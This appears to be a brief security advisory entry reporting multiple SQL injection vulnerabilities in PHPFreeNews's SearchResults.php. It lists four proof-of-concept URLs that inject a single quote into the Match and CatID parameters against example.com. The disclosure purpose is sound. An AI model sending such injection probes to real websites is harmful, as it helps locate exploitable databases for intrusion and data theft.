|
PHPFreeNews SearchResults.PHP Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof of concept URI are available: http://www.example.com/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0 http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=' http://www.example.com/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0 http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27 |
|
Privacy Statement |